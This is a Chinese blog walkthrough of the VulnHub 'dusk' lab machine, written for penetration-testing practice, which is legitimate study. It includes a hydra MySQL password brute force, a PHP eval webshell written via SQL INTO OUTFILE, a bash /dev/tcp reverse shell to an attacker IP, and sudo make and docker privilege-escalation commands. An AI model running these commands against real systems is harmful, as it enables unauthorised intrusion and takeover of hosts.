vulnhub靶机dusk-Writeup渗透测试

最新推荐文章于 2023-01-13 18:41:22 发布
最新推荐文章于 2023-01-13 18:41:22 发布
阅读量788 收藏 1
点赞数 1
分类专栏: vulnhub
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Long_gone/article/details/103686391
版权

一、信息搜集

打开靶机后还是先确定靶机IP:

arp-scan 192.168.34.0/24

在这里插入图片描述
我的靶机IP为:192.168.34.170,然后扫描一下它的端口开放情况:

nmap 192.168.34.170

在这里插入图片描述
发现它开放的端口还是挺多的,先看一下80端口:
在这里插入图片描述
没什么用,再访问一下8080端口看看:
在这里插入图片描述
从这个页面的得到的有用信息就一个:Local working directory:/var/tmp,知道了它的工作目录是:/var/tmp,然后扫描一下目录看看:

dirb http://192.168.34.170

在这里插入图片描述
并没有什么有用的信息。既然3306端口开着,那就先爆破一下看看:

hydra -l root -P /usr/share/wordlists/rockyou.txt 192.168.34.170 mysql

在这里插入图片描述
爆破出来数据库的密码后进行远程登陆:

mysql -h 192.168.34.170 -u root -p

在这里插入图片描述
进去以后查看数据库后也没有发现什么有用的信息,然后试着给网站的工作目录写一个一句话木马:

select "<?php eval($_GET['cmd']);?>" into outfile "/var/tmp/3.php";

在这里插入图片描述
写入成功后就准备使用bp抓包,然后反弹shell。反弹shell之前必须得先写一个bash反弹shell。

echo "bash -i >& /dev/tcp/192.168.34.107/8888 0>&1" | bash

然后改成url编码形式的:
在这里插入图片描述
先访问一句话里的那个路径,会发现是个空白页面:
在这里插入图片描述
然后使用bp抓包,把那个bash添加进去:

在这里插入图片描述(这里注意括号里面还有个单引号,使用单引号引起来的)
在这时要先用自己的攻击机监听你所设定的端口:
在这里插入图片描述
然后运行刚刚修改过的包,shell就会反弹过来:
在这里插入图片描述

二、提权

接下来就是要进行提权了,用sudo -l 可查看出当前用户就只能执行3个命令:ping,make,sl,这里我们要用到的是make命令,详情请参考 make makefile 大哥的博客

这里我就直接进行提权了:

sudo -u dusk make --eval=$'x:\n\t'/bin/sh

在这里插入图片描述

docker run -v /:/hostOS -i -t chrisfosterelli/rootplease

在这里插入图片描述

Long_gone
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶场,dusk
kukudeshuo的博客
09-20 232
vulnhub靶场,dusk 环境准备 靶机下载地址:https://www.vulnhub.com/entry/sunset-dusk,404/ 攻击机:kali(192.168.109.128) 靶机dusk(192.168.109.180) 下载好靶机之后直接使用VMware Workstation Pro虚拟机导入环境,启动即可,将网段设置为NAT模式 信息收集 使用arp-scan确定目标靶机 确定目标靶机IP为192.168.109.180 使用nmap扫描查看目标靶机端口开放情况 ..
vulnhub靶机:djinn2
最新发布
waitagirl的博客
03-22 1925
vulnhub靶机:djinn2
靶机测试djinn笔记
qq_56426046的博客
01-13 434
函数将传入来的字符串进行条件判断,如果满足以下条件等于 true 返回并且不会这些下面语句。翻译 哦,我忘了告诉你我在 1337 号港口为你准备了一个游戏。发现可以不需要密码执行 root 用户下的/root/lago 文件。这是 python flask 框架的 app.py 文件。帮助文档告诉我们可以执行 shell 经过测试均不能执行。通过这份源码 可以判断与 root/lago 文件一样。当 s 等于 num 会这些执行/bin/sh。
VulnHub AI-Web 1.0 靶机渗透
weixin_45908624的博客
12-29 1051
vulnhub ai-web1.0
渗透测试】第七周 vulnhub-Fawkes
铃的杂货铺分铺
11-08 1023
渗透测试学习第七周,vulnhub靶场Fawkes靶机。 主机发现、端口扫描;FTP匿名登录;edb 调试程序;栈溢出攻击;tcpdump 流量分析;sudo 漏洞提权。
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
[vulnhub]dusk-Writeup
Vicl1fe的博客
12-23 645
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 靶机网址: https://www.vulnhub.com/entry/sunset-dusk,404/ 靶机知识点: 靶机IP:192.168.34.170 kali IP:192.168.34.69 信息收集 nmap -sS -sV -p- 0-65535 192.168.34.170 端口开的不少。扫...
Hack djinn:1 : walkthrough【VulnHub靶场】渗透测试实战系列7
重新启程
12-14 901
靶场地址:djinn: 1 靶场介绍: Level: Beginner-Intermediate flags: user.txt and root.txt Description: The machine is VirtualBox as well as VMWare compatible. The DHCP will assign an IP automatically. You'll...
vulnhub之AI: Web: 2靶机
Vicl1fe的博客
09-29 662
尊重原创: 原文地址:https://blog.csdn.net/weixin_44214107/article/details/100979450
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7585
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
VulnHub系列』djinn: 1-Walkthrough
ins1ght的博客
12-02 1106
靶机发布日期:2019年11月18日,难度:中等。摘要啥的不重要~
vlunhub- BoredHackerBlog Moriarty Corp(内网渗透测试靶场)
rang的博客
08-19 2338
文章目录靶场环境主机发现利用nmap 进行二层扫描利用arp-scan扫描探测文件包含利用远程文件包含 执行木马通过 LFISuite自动化工具 利用文件包含漏洞暴力破解文件上传SSH弱口令# payload反弹# 任意密码修改# 添加代理# 远程代码执行# 内网探测 #个人总结 靶场环境 攻击机:kali(192.168.1.100) 目标机:Moriarty Corp(192.168.1.105) 内网(172.17.0.0/24) 这里用vmware搭建靶场扫描不到目标,改用VM_VirtualBo
VulnHub渗透测试实战靶场 - BSIDES VANCOUVER: 2018
LYJ20010728的博客
08-08 773
VulnHub渗透测试实战靶场 - BSIDES VANCOUVER: 2018环境下载BSIDES VANCOUVER: 2018靶机搭建渗透测试信息搜集漏洞挖掘方法一方法二getshell方法一提权方法一 环境下载 戳此进行环境下载 BSIDES VANCOUVER: 2018靶机搭建 具体步骤参考VirtualBox(Host only)和VMware共用同一虚拟网卡 将下载好的靶机环境,导入VritualBox,设置为Host-Only模式 将VMware中桥接模式网卡设置为VritualB
vulnhub FristiLeaks: 1.3
箭雨镜屋
02-04 2247
渗透思路: nmap扫描----->查看robots.txt,并根据主页信息推测出admin portal的url----->查看网页源代码,分析注释,base64解码出包含重要信息的png图片----->hydra暴力破解网站用户名密码(其实不需要暴力破解)----->利用文件上传(apache httpd多后缀文件解析漏洞)获得反弹shell----->利用定时文件修改目录权限----->编写python脚本解码,得到admin和fristigod的密码----->sudo提权获得root权限
利用Vulnhub复现漏洞 - AppWeb认证绕过漏洞(CVE-2018-8715)
JiangBuLiu的博客
06-27 1050
AppWeb认证绕过漏洞(CVE-2018-8715)Vulnhub官方复现教程漏洞原理漏洞环境启动环境浏览器BurpSuite漏洞复现【注意】Burp不知名原因,会消失最后一个字节利用session Vulnhub官方复现教程 https://vulhub.org/#/environments/appweb/CVE-2018-8715/ 漏洞原理 AppWeb是Embedthis Softwar...
Vulnhub靶机渗透环境搭建及JIS-CTF入门实践
Vulnhub靶机环境可以帮助我们学习和实践渗透测试技术。 二、JIS-CTF题目描述 JIS-CTF是日本信息安全竞赛,旨在提高日本信息安全技术的水平。JIS-CTF题目涵盖了网络安全、系统安全、加密安全等多个领域。 三、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值